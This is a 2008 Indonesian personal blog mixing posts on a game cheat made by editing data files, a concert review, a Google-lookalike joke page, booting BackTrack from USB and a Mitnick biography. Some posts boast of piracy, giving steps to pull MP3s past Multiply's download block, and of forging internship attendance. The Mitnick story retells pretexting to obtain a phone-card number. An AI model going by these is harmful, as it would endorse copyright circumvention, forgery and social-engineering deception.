Sebenarnya ane uda sering sih ngeliat bisnis-bisnis yang menjanjikan menjadi cepat kaya di internet, dulunya sih ane kurang tertarik ane anggap itu cuma penipuan belaka dengan target pasaran orang-orang awam, tetapi lama-lama diperhatikan kok makin berkembang aja dunia internet marketing tanah air so ane putuskan utk ikut bergabung. Atas dasar rasa penasaran ini lah ane berusaha mencari informasi bisnis apa yang cocok buat orang kere kaya saya ini. oke,, ketemu.. banyak iklan-iklan nyang ngejual script-script website bisnis, jadi kepengen juga ngjual script, tapi… dapat dimana ya script nya??? mo buat script sendiri huaaaa,, jauh deh,.. hmm.. ane ada ide.

Coba tebak!! ane berhasil mendapatkan script-script yang biasa dijual di situs-situs lokal 100% gratis. kok bisa? haha,, rahasia dong.. rajin-rajin aja scanning . Ternyata dugaan ane dulu benar, beberapa diantara situs-situs marketing ini hanya memanfaatkan keluguan pengguna internet yang masih awam dengan janji yang muluk-muluk, seperti membeli kucing dalam karung beberapa situs malah menjual script-script yang sebenarnya bisa didapat di internet secara gratis, tetapi bagi netter awam yang sudah termakan kalimat iklan tentu tidak peduli hasilnya kekecewaan pun didapat setelah melihat produk sesungguhnya itu adalah produk2 gratisan. Script2 yang udah di dapetin ane jual dengan harga jauh lebih murah alhasil banyak yang tertarik dan uang pun mengalir dengan sendirinya.. hehe.. Lumayan deh buat duit rokok

Tapi sekarang ane uda males, gak tau kenapa? bosen kali promosi terus.. so ane putuskan sekarang menghidupkan kembali blog ini dan kembali ke dunia “hitam” maya.

Magang Tak Magang yang Penting Absen

2008-05-14T21:34:00.005+07:00

HARI SENIN : ALPA
---------------------------

HARI SELASE : HADIR..

Saye : Salamlekom..
Guru : Komsalaaam, ooo kau za..
Saye : Iye bu (sambel cengengesan, maklom tumben2 masok magang)

begitu masuk ruangan, ambek meje, ambek kursi, idopkan modem.. onlineee..

....
....
....
....
Setengah jam berlalu ......
tadak betegor me orang laen neh.. asiik jak ngenet.. eh datang pulak aek teh same lepat, untung gak bukan dikasi roti kebeng.. saye alergi roti kebeng
....
....
....
45 menit berlalu..
tadak gak betegor same guru-guru disitu.. mane duli..
....
....
....
Satu jam berlalu...
TADAK GAAAAK.. sape suroh tak ngasik saye kerjaan.. kalo ade pun tak saye kerjekan..heuheuehe
....
....
....
....
Satu setengah jam...
Mate dah merah ngadap monitor...
....
....
....
Dua jam kurang sikit..
Bekemas.. siap-siap balek
saye : Balek lok pak.. bu..
Guru : Oo.. iyeela.. (Jawabnye mcam terpakse)..
Saye : Salamlekom...
Guru : (tak sempat dengar die jawab ape, ntah maki2 ke ntah ape ke.. dah keluar dolok dah saye)
------------------------

HARI RABU : ALPA

-------------------------
HARI KAMIS : ALPA
--------------------------
HARI JUM'AT : ALPA
-------------------------
HARI SABTU : ALPA
--------------------------
HARI MINGGU : (BELEBEH DAH NI...)

Setelah dua minggu berlalu dengan rutinitas yang kate orang "jaohkan bale lah" magang cam gitu...Sambel nenteng kertas.. maksodnye nak mintak tande tangan KS same cap sekolah untuk absen magang selama ini...

Absen yang saye buat sorang ni, isi nye 80% "HADIR" (nampak merampotnye kan?)

Saye : Salamlekom..
Guru : Komsalam..
Saye : Pak mintak tande tangan same cap .. untuk absen magang..

TO BE CONTINUE...

Kontak

2008-05-14T21:21:00.004+07:00

PLEASE CONTACT

Maen Curang "Hacker Evolution"

2008-05-11T15:30:00.004+07:00

Hacker Evolution, satu lagi game yang di peruntukkan bagi mereka yang tertarik memperdalam ilmu di bidang seni hacking, cracking, ataupun security networking. Hacker Evolution dapat di download disini http://download381.mediafire.com/../_Evolution_...rar

Dengan memanfaatkan sebaik mungkin sources yang ada kita dituntut untuk menyelesaikan misi yang sudah ditentukan, misalnya menyusup ke server suatu perusahaan, mencuri uang dengan membobol bank, mencuri data, menghapus trojan, dan lain-lain. Dengan mencuri uang dengan membobol atm kita bisa menambah "money" kita yang dapat dipergunakan untuk meng-upgrade komputer standar kita dan juga dapat digunakan untuk menghapus jejak "trace". Semakin tinggi spesifikasi komputer maka semakin mudah untuk menyelesaikan misi. Apa bila berhasil menyelesaikan misi maka score pun kan terus bertambah dan berhak melnjutkan ke misi level selanjutnya yang tentu nya lebih sulit lagi. Command-command yang digunakan mirip dengan command dasar inux tapi tidak sama persis loh, namanya juga game. Cari aja review lengkap nya di google

Setelah saya coba game ini, ternyata gampang banget, soal nya level tutorial (udah ada petunjuk nya) tinggal ikutin aja perintah nya..hehehe.. Trus lanjut level pertama wah lumayan susah, tapi akhirnya selesai juga, ketagihan neh, lanjut level kedua..waaaahh.. sukses... hajar terus level ketiga..zzZzz..Zzz.. arrr... nyeraaahh deh..

Putar otak sana-sini jungkir balik sana-sini, tapi aahhh.. kena trace mulu.. apa mau di kata, emang bukan bakat sih jadi security profesional..

Sedikit otak curang terlintas nih.. kali aja di program file nya ada yang bisa di obok-obok, akhirnya ketemu juga deh..

Data-data setiap level disimpan dalam satu folder, misal nya level 3 memiliki data di C:\Program Files\Hacker Evolution\hemod-hackerevolution\he-level-3, nah keliatan kan folder-folder host-host yang ada. Host-host nya uda ketahuan tuh.. tapi bukan cuma itu aja, kita bisa membuka host-host yang diproteksi password, menghilangkan enkripsi, bahkan merubah nilai money yang dimiliki host-host yang ada.

Pada setiap folder level terdapat folder-folder host, dan di setiap folder host terdapat file info dan services, file info dan services ini lah yang dapat kita manipulasi. Buka file info dengan notepad yang pada folder host sec.interlink.net di folder level 3 (he-level-3) , maka kita akan melihat

560 90
3000
128

560 90 adalah titik koordinat lokasi host pada map
3000 adalah money yang terdapat pada host tsb, ganti sesuka hati.
128 adalah encryption key yang melindungi host tsb 128 = 128 bits. Ganti dengan 0 untuk menghilangkan enkripsi nya

pada file services

4
80 httpd rn04
150 sec.interlink.net(authorize) twde3546mfrg
151 kernel_services rn08
152 management_services rn12

4 adalah jumlah port yang digunakan host
80 menunjukkan port 80, menggunakan service httpd dengan rn04 atau 4 karakter password, ganti rn04 dengan none maka proteksi password akan hilang.
Begitu juga port-port selanjut nya...

Setelah game di restart... WAW.. segala proteksi pada host-host yang sebelum nya ada jadi hilang, gak perlu lagi takut kena trace, karena setiap host bisa di jebol dengan mudah nya.. Entah kenapa developer game ini tidak mengenkripsi kode-kode program nya, akhirnya game nya mudah di manipulasi dengan mudah.. mungkin aja adalah inti game ini dibuat, soal nya game ini mustahil banget bisa selesai kalo gak di akalin (emang saya nya aja yg males mikir). Tapi kembali ke hati nurani masing-masing, lebih menarik mana, nge-game hacking?? ato nge-hacking game?? apa menariknya maen game ini kalo udah kaya gini ??

sebelum: host-host masih terproteksi

setelah : host-host unprotected

Captain Jack rock in Pontianak

2008-05-03T00:41:00.030+07:00

Kemarin (jum'at 2 mei, 08), bertempat di kampus Politehnik Negeri Pontianak. Diadakan acara penutupan Expo yang sudah berlangsung sejak 14 Maret lalu. Tidak seperti biasa, pada malam terakhir ini terlihat begitu antusias nya kaula muda Pontianak berdatangan ke halaman depan kampus Polnep. Tidak lain disebabkan pada malam tsb di meriahkan oleh penampilan band rock tamu yang bermarkas di jogja, yaitu CAPTAIN JACK.

Pukul 19.30. Aku pun sempat kaget, begitu sampai di kampus antrian kendaraan sudah begitu panjang, bahkan sampai keluar kampus. Dianggap tidak memungkinkan untuk ikut antrian akupun memutar balik jet tempur ku, berharap bisa lewat jalan belakang kampus. Tapi sampai di jalan belakang ternyata gerbang belakang ditutup, harapan ku untuk markir motor pun sirna. Tak habis pikir sampai disitu, akupun ingat ada rumah teman yang rumahnya tidak jauh dari kampus, numpang marikir disitu aja. perjalanan ke kampus pun dilanjutan dengan berjalan kaki kurang lebih 150 meter.

Sempat tersiar kabar kalau Captain Jack bakal batal tampil, tapi untung lah semua itu hanya bisik-bisik tetangga. Sebelum Captain Jack perform, para hadirin di suguhkan berbagai acara, seperti penampilan band-band lokal dan juga parodi yang dibawakan UKM Seni Polnep. Sempat molor sekitar satu setengah jam dari jadwal yang di tentukan 20.30. Akhirnya Captain Jack pun turun manggung untuk memuaskan para JACKERS Pontianak.

CAPTAIN JACK. Band yang di huni oleh Momo (vocal/guitar), Zuhdil (guitar), Novan (bass), Ismed (keyboard), Andi (drum) ini mengusung aliran Emo Rock. Lagu-lagunya bertemakan kritikan sosial dibalut distorsi tingkat tinggi, mengangkat kisah-kisah realita kehidupan, serta anti kemapanan yang memang pantas untuk di konsumsi masyarakat saat ini (sok sosialis dulu). Para personil CJ sendiri sebagian besar berasal dari Pontianak (hanya Zuhdil dari Tuban, Jawa Timur), jadi bisa dibilang kehadiran CJ di Pontianak berarti kembalinya CJ ke tanah kelahiran mereka.

Dengan lagu pertama Buat Yang Percaya (yg telah di garap ulang) dengan alunan gitar penuh distorsi CJ tampil mengguncang suasana. Para Jackers (fans CJ) pun sontak berjingkrakan dan melantunkan lagu yang sedang di bawa dengan padu. Tanpa kehadiran sang Ismed (keyboard) yang berhalangan hadir maka posisi kiboris pun digantikan dengan kiboris 13 FIGHTING (aku lupa namanya). 13 FIGHTING sendiri band dengan aliran yang sama dengan CJ, dan menurut history -nya band ini terbentuk berasal dari kota Putussibau Kalbar (dekat Pontianak). Wajar saja kalo CJ minjem kiboris nya 13 FIGTHING.

Membawakan sekitar 10 lagu (kalo gak salah) Captain Jack perform di kampus Polnep, sebagian dari album lama, seperti Siapa Aku, Munafik, Pahlawan, Entah Sampai Kapan, Sempurna dll, sebagian lagi CJ mempromosikan lagu-lagu terbarunya dari mini album HATI HITAM. Captain Jack bukanlah band yang begitu terkenal, tidak seperti band2 yang kebanyakan berhamburan saat ini yang hanya dengan modal tampang dan masuk TV bisa jadi terkenal dan di gilai para harim. Diawali dengan karir di indie, mereka berusaha mengeekspresikan diri mereka dengan bermusik. Musik2 mereka 100% garapan asli tanpa campur tangan pihak industri yang lebih mengutamakan nilai surplus semata. Mereka tidak ingin musik mereka di ganggu pihak manapun, dengan begitu tidak ada lagi batasan untuk menyampaikan pesan-pesan dalam lagu mereka kepada pendengar. Tidak heran, pada saat tampil hanya para jakcers fanatik saja yang dapat ikut bernyanyi dan berdendang dengan penuh khidmat.

Penonton padat, untung nya aku dapat tempat yang asik. Di depan penonton, dan tepat di depan panggung (kaya panitia / wartawan gitu..) tanpa halangan sedikitpun. Dengan leluasa aku nonton band favorit ku ini.

Oke deh.. Pokok nya sukses terus buat CAPTAIN JACK.

Keep RAWK!!

Download MP3 di Multiply.com

2008-05-02T16:19:00.027+07:00

Setelah sekian lama gak buka multiply. Iseng-iseng buka multiply nya Captain Jack band (band favorit neh..) buat nyari lagu-lagu terbaru, ternyata.. waw.. ada lagu baruuu.. tapi kok gak bisa di download?? dulu kan bisa, yang ada cuma file m3u yg setelah di download baru bisa di dengar lagu-lagu nya lewat streaming di winamp.

Setelah saya cek & ricek dan kabar-kabari, ternyata multiply.com menerapkan kebijakan baru. Karena di anggap melanggar hak cipta karya orang lain maka fasilitas free download mp3 yang di upload user kini dihilangkan (baru nyadar nih.. ), sebagai ganti nya user tetap bisa mendengar lagu-lagu kesayangan secara streaming (doang..) . Beberapa multiply teman-teman saya juga sudah berubah, yang dulunya koleksi musik nya bisa di download kini berubah menjadi "play this list". Tapi beberapa multiply juga tetap tidak berubah, masih bisa di download seperti biasa, termasuk multiply saya.

Apakah sampai disini nasib para pembajak Hak Cipta ? Dengan menyesal dan juga senang saya katakan "tidak juga.." Hasil dari bertanya dengan pak google, ditemukan berbagai macam trik untuk download mp3 dari multiply. Tapi cukup rumit, bahkan ada yang menggunakan program tertentu.

Saking nge fan dan pengennya dapetin lagu baru Captain Jack, akhirnya saya temukan cara yang lebih simple. Sekarang bersiaplah dengan hati nurani dan moral anda, karena kita akan membahasnya.

Download file m3u
Jalankan m3u dengan winamp, saya menggunakan winamp v5 yg sudah umum beredar
Setelah play list nya keliatan di winamp, klik kanan pada lagu yang ingin di download >> View File Info..atau tekan Alt+3
Copy url yang paling atas di kotak MP3 Stream Info Box
Jalan kan url tersebut dengan browser
Lagu kesayangan udah bisa di download

Berhasil bukan ?? (Para pembajak pun tersenyum seperti setan...)
ck..ck..ck.. memang anda tidak mempunyai hati nurani dan beban moral sedikitpun ( sama seperti saya ). Namun apa mau dikata, seperti kata Milo dedengkot nya genk starbucks "Pengetahuan manusia milik dunia".

Umum nya trik ini bisa di jalankan di file m3u mana saja, tidak hanya di multiply.com. Sekarang kebijakan multiply.com kayanya menjadi angin lalu.

NB:
Mohon maaf yang sebesar-besarnya (sekaligus terima kasih sebanyak-banyaknya) kepada Captain Jack band atas lagu baru gratis nya. :).
Kalian ada karena kami ada.

Bikin Google Iseng

2008-05-01T13:50:00.018+07:00

www.google.keren.la, www.google.hancur.org ternyata situs iseng ini bikin penasaran teman-teman, baiklah.. mungkin pembahasan kali ini dapat melunasi hutang janji-janji saya . terutama kepada si InyonK (dudutz).. heuehue..

Sebenarnya untuk membuat site seperti ini hanya dibutuhkan keterampilan yang sangat dasar dari html. dan penggunaan program html editor (saya make macromedia dreamweaver mx). Untuk layanan hosting dapat menggunakan layanan dari situs mana saja, begitu juga dengan redirect url (untuk memperpendek url), silahkan tanya pak google. Disini saya menggunakan www.ripway.com sebagai hosting untuk file, dan memanfaatkan layanan web forward dari www.freedns.afraid.org sebagai redirect url.

PERHATAN!! bahasan kali ini hanya untuk yang belum tau, juga untuk melunasi janji saya kepada teman-teman. Bagi master-master web design jangan coba-coba comment disini atau nanti saya pecahin jerawat nya satu-persatu.

Mulai!!

Siapkan gambar-gambar yang ingin digunakan masukkan semuanya dalam satu folder Untuk membuat logo yg mirip dg google, bisa di buat situs http://funnylogo.info/engines/Google/Red/silahkan diganti disini.aspx. Misal http://funnylogo.info/engines/Google/Red/Google Bajakan.aspx. downlad logo tsb. pastikan nama-nama file gambar tidak menggunakan karakter spasi.
Buka www.google.co.id, ambil page source nya, caranya klik kanan >> view page source
copy isi source page nya, paste kan ke html editor.
Edit tampilan nya sesuai keingingan. Gunakan gambar-gambar yang sudah disiapkan sebelumnya.
Cari di bagian code <form action="/search" name="f">, ganti dengan <form action="http://google.co.id/search" name=f>. Ini penting karena inilah yang membuat serch engine buatan kita bisa berfungsi.
Simpan file html kedalam folder gambar tadi. Pastikan nama file tidak ada karakter spasi. Misal google_bajakan.html

Sampai disini google kita udah jadi, silahkan di coba dulu, buka file google_bajakan.html dengan browser. ketikkan sesuatu lalu search.

Selanjut nya kita akan menghostingkan file-file udah di buat.

Buat akun di www.ripway.com dan di www.freedns.afraid.org
Upload file-file tsb ke ripway.com. setelah di upload klik open untuk melihat hasilnya. Liat url nya. Misal http://h1.ripway.com/elborneo/google_bajakan.html. Oke.. berarti google kita udah bisa di akses online
Masuk ke freedns.afraid.org. Siapkan domain yang diinginkan. Klik Registry, maka akan terlihat domain-domain yang tersedia, silahkan pilih domain nya, ingat pilih yg public. Ingat-ingat aja dulu domain yg uda dipilih dalam otak. Misal "fuck-you.info".
Klik Preferences >> Customize Domain List >> Customized Domain List >> Update
Masukkan domain yg dipilih, yaitu fuck-you.info. >> submit
Klik Web Forward >> Add >> ganti yourname, misal google >> pada kolom kiri pilih fuck-you.info >> pada kolom Redirect to masukkan url dari ripway.com tadi, yaitu http://h1.ripway.com/elborneo/google_bajakan.html. >> centang "cloak" dan "force dir root" >> "Page Title: (if cloaked)" : isi nya terserah, misal "Google Bajakan.
Save

Sekarang liat apa uda jadi belum. Buka www.google.fuck-you.com. Kalo belum jelas silahkan comment aja, maklum aja.. saya bukan penulis yang baik. Yang mau video nya silahkan datang ke rumah.. kalo ke rumah yaahhh.. bawa apaaa gituuu....heeueuehe...

Booting backtrack 3 dari usb flashdisk

2008-04-30T02:15:00.009+07:00

* Kenapa backtrack?

Karena Backtrack merupakan salah satu Distro linux yg top cerrr banget buat jaringan. Secara ane nih anak TKJ GTL (GiTu Loch). Aplikasi administrator jaringan buanyak buanget. Mo internet gratis?, Backtrack solusinya..

* Kenapa USB Flashdisk?

Dengan FlashDisk kita bisa dengan mudah membawa-bawa Distro ini di kantong kita, kecil, ringan, imut2, lucu, space yg besar dll. Mo pake tinggal colok. Dengan live CDnya juga bisa sih, tapi apa gak repot??, CD kan rentan terkena goresan, retak, patah, kotor. Lagi pula flash disk lebih cepat nge load di banding CD.

* Kenapa harus booting??

Tanya kenapaa??

Oke langsung aja.

Flash disk 1 GB.
flashdisk dengan file system FAT, sebelumnya backup dulu file2 pentingnya.
file iso backtrack nya ke USB Falsh Disk, kalo belum punya donlod aja di http://www.remote-exploit.org/backtrack_download.html. (Download nya kurang lebih satu setengah hari)
CMD. Masuk ke lokasi Drive USB nya, enter
ke direktori /boot, enter.
lagi bootinst.bat, enter
aja perintah selanjutnya.
kompi anda, Flashdisk tetap terpasang.
ke BIOS, set primary boot nya ke USB. enter
makan-makan

Terlalu berlebihan ya??, padahal sebenarnya simple aja tuh..
O ya.. nih posting nya dari Backtrack3 loch, yg booting langsung dari USB ane ( Kingstone Data Traveler 1 GB)

Bukan maksud sok tau atau sok imut, hanya berbagi apa yg bisa di bagi.

Smoga bisa membantu

HACKER LEGEND

2008-04-30T02:10:00.004+07:00

Sebuah ketukan terdengar dari pintu apartemennya, Kevin Mitnick membuka pintu dan mendapati lusinan agen FBI dan penegak hukum lain sudah bersiap untuk menangkapnya. Ini adalah akhir perjalanan seorang hacker yang terpaksa buron demi menghindari hukuman penjara. Hacker yang selama masa buronannya itu telah mendapatkan status legendaris, bahkan telah tumbuh menjadi sebuah mitos yang lebih besar dari dirinya sendiri

Penangkapan yang terjadi pada 1995 itu menandai awal dari kasus penahanan yang paling kontroversial terhadap seorang pelaku kejahatan cyber. Mitnick adalah seorang penyusup pada sistem komputer menjelma sebagai America’s Most Wanted Hacker.

Kecanduan Komputer

Mitnick mudah mempelajari komputer dengan nongkrong di toko radioshack atau diperpustakaan umum, keluarganya tidak cukup berduit untuk memiliki komputer sendiri. Kesukaannya pada komputer berkembang hingga ia dewasa.

Pada periode 1990-an, Mitnick mudah sekali keluar masuk sistem komputer. Namun pada akhir 1980-an ia sebenarnya ingin meninggalkan hobynya tersebut dan mulai mencari pekerjaan yang sah. Sayangnya, sebelum ia bisa melakukan itu, pada 1987 ia tertangkap karena menyusup perusahaan Santa Cruz Organization, sebuah perusahaan piranti lunak yang terutama bergerak dibidang sistem operasi Unix. Ketika itu pengacara mitnik berhasil menurunkan tuduhan kejahatan menjadi tindakan yang kurang baik, Mitnick pun hanya di ganjar 3 tahun masa percobaan.

Tidak sampai setahun Mitnick kembali tersandung kasus hukum. Gara-garanya seorang teman yang komputernya ia gunakan untuk membobol komputer lain melaporkan Mitnick yang berwajib kali itu yang dibobol Mitnick adalah milik Digital Equipment Corporation. Setiap kali membobol komputer yang dilakukan mitnik adalah mengambil code penyusun dari piranti lunak. Kode itu kemudian dia pelajari dengan sungguh-sungguh, terkadang menemukan beberapa kelemahan didalamnya. Dalam sebuah kesempatan Mitnick hanya mengaku mengambil kode penyusun dari piranti lunak yang ia sukai atau yang menarik baginya.

Dalam kasus DEC Mitnick mendapatkan masa tahanan yang lebih berat. Ketika itu pengacaranya menyebut Mitnick memiliki, ‘kecanduan pada komputer yang tidak bisa dihentikan’. Ia diganjar 1 tahun penjara.

Di penjara Mitnick mendapatkan pengalaman yang buruk. Pada saat itu legenda Kevin Mitnick atau yang lebih dikenal juga dengan nama samaran ‘the condor’, sudah semakin membesar. Reputasinya sebagai seorang
penjahat komputer juga semakin membumbung melebihi kenyataan. Sipir di Lompoc, penjara tempat Mitnick berada, mengira Mitnick bisa menyusup kedalam komputer hanya dengan berbekal suara dan telepon. Walhasil
Mitnick bukan hanya tidak boleh menggunakan telepon, ia juga menghabiskan waktu berbulan bulan dalam ruang isolasi. Tak heran jika kemudian ia dikabarkan mengalami sedikit gangguan jiwa saat menjalani hukuman di Lompoc.

Tahun 1989 Mitnick dilepaskan dari penjara. Ia berusaha mencari pekerjaan yang resmi, namun statusnya sebagai mantan narapidana membuat Mitnick sulit mempertahankan pekerjaan. Akhirnya ia bekerja sebagai
pendulang informasi untuk kantor penyelidik kantor swasta. Tentunya ini menyeret Mitnick kembali kepada dalam dunia yang abu-abu dan hitam. Pada awal 1990-an, Mitnickpun dicari lagi oleh FBI. Kali ini takut akan masuk ruang isolasi selama bertahun-tahun, Mitnick memutuskan untuk kabur.

Hacking The Human Side

Keahlian Mitnick sebagai hacker tidak terbatas pada kemapuan teknis belaka. Ia merupakan pada kemampuan teknis belaka. Ia merupakan seorang yang memahami betul bahwa keamanan sistem komputer terdiri dari aspek kebijakan organisasi, sumber daya manusia, proses yang terlibat serta teknologi yang digunakan. Seandainya ia seoarang pahlawan super kemapuannya utama Mitnick adalah seoarang yang mempraktekan ilmu social engginering alias rekayasa sosial. Ini adalah sebuah teknik mendapatkan informasi penting, semisal password, dengan memanfaatkan kelemahan manusiawi.

Kemampuan Mitnick paling baik diilustrasikan dalam cerita berikut, cerita yang dikisahkan Mitnick sendiri pada sebuah forum online Slasdot.org

“Pada satu kesempatan, saya ditantang oleh seorang teman untuk mendapatkan nomor (telepon) Sprint Foncard-nya. Ia mengatakan akan membelikan makan malam jika saya bisa mendapatkan nomor itu. Saya tidak akan menolak makan enak, jadi saya berusahan dengan menghubungi Customer Service dan perpura-pura sebagai seorang dari bagian teknologi informasi. Saya tanyakan pada petugas yang menjawab apakah ia mengalami kesulitan pada sitem yang digunakan. Ia bilang tidak, saya tanyakan sistem yang digunakan untuk mengakses data pelanggan, saya berpura-pura ingin memverifikasi. Ia menyebutkan nama sistemnya.”

“Setelah itu saya kembali menelepon Costumer Service dan dihubungkan dengan petugas yang berbeda. Saya bilang bahwa komputer saya rusak dan saya ingin melihat data seorang pelanggan. Ia mengatakan data itu sudah berjibun pertanyaan. Siapa nama anda? Anda kerja buat siapa? Alamat anda dimana? Yah, seperti itulah. Karena saya kurang riset, saya mengarang nama dan tempat saja. Gagal. Ia bilang akan melaporkan telepon telepon ini pada keamanan.”

“Karena saya mencatat namanya, saya membawa sorang teman dan memberitahukannya tentang situasi yang terjadi. Saya meminta teman itu untuk menyamar sebagai ‘penyelidik keamaman’ untuk mencatat laporan dari petugas Customer Service dan berbicara dengan petugas tadi. Sebagai ‘penyelidik’ ia mengatakan menerima laporan adanya orang berusaha mendapatkan informasi pribadinya pelanggan. Setelah tanya jawab soal telepon tadi, ‘penyelidik menyakan apa informasi yang diminta penelepon tadi. Petugas itu bilang nomor Foncard. ‘penyelidik’ bertanya, memang berapa nomornya? Dan petugas itu memberikan nomornya. Oops. Kasus selesai”

Buron

Sebagai buronan Mitnick berusahan sebisa mungkin untuk tidak tertangkap. Ia sering berpindah-pindah tempat tinggal dan selalu menanggalkan berbagai kebiasaan. Berbagai cara ia lakukan agar tidak terlacak oleh pengejarnya. Namun ia tidak bisa meninggalkan hobinya mengoprek komputer dan jaringan Internetnya. Bahkan beberapa keahliannya konon digunakan untuk mendapatkan identitas baru.

Legenda Mitnick selama buron dalam kurang lebih dua tahun, semakin menjadi-jadi ia menjelama sebagai ‘Ninja Cyber’ yang konon bisa membobol komputer Pentagon hanya dengan remote televisi, sebuah rumor yang melebihi cerita fiksi apapun.

Mengapa Mitnick, seorang buron dalam kasus pembobolan komputer, bisa menjadi penjahat yang paling dicari? Ini tak lepas dari peran media massa. Secara khusus adalah serangkaian artikel sensasional dari John Markoff yang dimuat di New York Times.

Markoff mengutuk Mitnick bagaikan seorang teroris. Dalam sebuah pernyataan setelah lama dibebaskan, Mitnick menyebut citra dirinya yang ditampilkan Markoff bagaikan seoarang teroris yang berusaha mengendalikan nuklir dunia. “saya seakan-akan seorang Osama bin Mitnic,” ujarnya bercanda.

Markoff menggambarkan Mitnick sebagai seorang yang mematikan, tak bisa dihentikan dan layak menjadi buronan sepuluh besar FBI maupun penegak hukum lainnya. Artikel Mafkoff, yang kadang muncul di halaman depan, menjadikan Mitnick kandidat terkuat proyek percontohan atas kejahatan cyber. Maka masa depan Mitnick dalam penjara boleh dibilang sudah dituliskan saati itu juga.

Selama menjadi buron Mitnick juga terus menjalankan aksinya. Ia membobol berbagai komputer perusahaan besar. Termasuk Sun Microsystem. Ia menggunakan, dan maksutnya disini adalah membobol rekening seorang pada layanan penyimpanan online untuk menyimpan backup dari hasil aksinya. Sebenarnya Mitnick tidak bekerja sendirian namun saat tertangkap ia tak pernah mengungkapkan siapa saja rekannya.

Salah satu korban Mitnick adalah T. Shimomura, seorang ahli komputer yang dalam beberapa tulisan di Internet diragukan kebersihannya. Ada dugaan bahwa Shimomura juga seorang hacker yang kerap melakukan perbuatan ilegal. Satu hal yang banyak disetujui adalah Shimomura memiliki sikap yang arogan dan nampaknya ingin muncul sebagai pahlawan dalam kisah perburuan Mintick.

Shimomura, Markoff dan FBI bahu membahu untuk menangkap sang buronan. Panduan dari berita sensasionalnya Mafkoff, kemampuannya hacking Shimomura dan kekuatan hukum FBI pada akhirnya melacak kediaman Mitnick.

Seperti biasanya kisah tertangkapnya seoarang buron, Mitnick melakukan ketledoran. Layanan penyimpanan yang ia gunakan rupanya memiliki program otomatis untuk mencek isi file yang disimpan. Pemilik rekening yang digunakan Mitnick mendapatkan peringatan dari sistem mengenai kapasitas berlebih. Ini adalah awal tertangkapnya Mitnick.

Mitnick mengakui bahwa dirinya ceroboh karena tidak menduga bahwa FBI, Shimomura, Markoff, dan penyedia layanan telepon selular melakukan kerja sama yang begitu erat dan terpadu.

“Operator seluler melakukan pencarian dalam database penagihan mereka terhadap dial-up ke layanan Internet Netcom POP. Ini, seperti bisa diduga, membuat mereka bisa mengidentifikasi area panggilan dan nomor MIN (mobile identification number) yang saya gunakan saat itu. Karena saya kerap berganti nomor, mereka mengawasi panggilan data apapun yang terjadi di lokasi tersebut. Lalu, dengan alat Cellscope 2000 Shimomura, melacak sinyal telepon saya hingga ke lokasi yang tepat,”Mitnick menuturkan.

Dua minggu sebelum tertangkapnya Mitnick baru pindah ke Raleigh. Lokasi baru membuat kurang waspada dan ia lupa melacak jalur dial-up yang digunakannnya. Beberapa jam sebelum tertangkapnya Mitnick baru ada sesuatu yang terjadi, pelacakan dan pengawasan sedang dilakukan terhadap jalur yang ia gunakan. Saat ia sedang berusaha melacak sejauh mana pengawasan telah dilakukan hingga siapa dilbalik pelacakan tersebut, ia mendengar ketukan pintu. Mitnick membuka pintu dan berhadapan dengan lusinan U.S Marshall dan FBI.

Empat Setengah Tahun Digantung

Setelah tertangkap Mitnick ditahan tanpa kemungkinan jaminan. Ia juga tak diajukan untuk pengadilan. Kurang lebih empat tahun ia habiskan tanpa kepastian. Hal ini benar-benar membuat Mitnick frustasi.

Selama dalam penjara FBI ia tak mendapatkan kesempatan dalam kasusnya. Bahkan Mitnick dan pengacaranya tak bisa melihat data kasus tersebut karena terdapat di laptop dan akses laptop bagi Mitnick dianggap membahayakan. Mitnick dituding bisa membuat misil meluncur hanya berbekal laptop atau telepon. Larangn itu tetap berlaku meskipun pengacaranya menggunakan laptop tanpa modem dan kemampuan jaringan apapun.

Mitnick pada akhirnya dituding menyebabkan kerugian hingga ratusan juta dollar kerugian yang menurut Mitnick tidak benar, karena perusahaan yang konon dirugikan bahkan tidak melaporkan kerugian tersebut dalam laporan tahunan mereka.

Kesepakatan akhir bagi Mitnick adalah pengakuan bersalah. Bersalah dalam kasus pembobolan komputer dan penyadapan jalur telepon. Mitnick menyerah dan mengikuti itu, dengan imbalan 4 tahun tahun lebih waktunya dalam penjara diperhitungkan sebagai mas tahanan. Total Mitnick dihukum adalah 5 tahun dipenjara , 4 tahun dalam tahanan yang terkatung-katung dan 1 tahun lagi sisanya.

Ia dibebaskan pada tahun 2000 dengan syarat tak boleh menyentuh komputer atau telepon. Pada tahun 2002 baru ia boleh menggunakan komputer tapi tidak yang tersambung ke Internet. Baru tahun 2003 ia menggunakan Internet lagi untuk pertama kalinya.

Sejak dibebaskan Mitnic berusaha untuk memperbaiki hidupnya. Ia menuliskan dua buku mengenai hacking, selain itu ia juga mendirikan perusahaan konsultan keamanan sendiri. “Hacker adalah satu-satunya kejahatan yang keahliannya bisa digunakan lagi untuk sesuatu yang etis. Saya tidak pernah melihat itu dibidang lain, misal perampokan etis,” tutur Mitnick.

Nama
Email
Subject
Message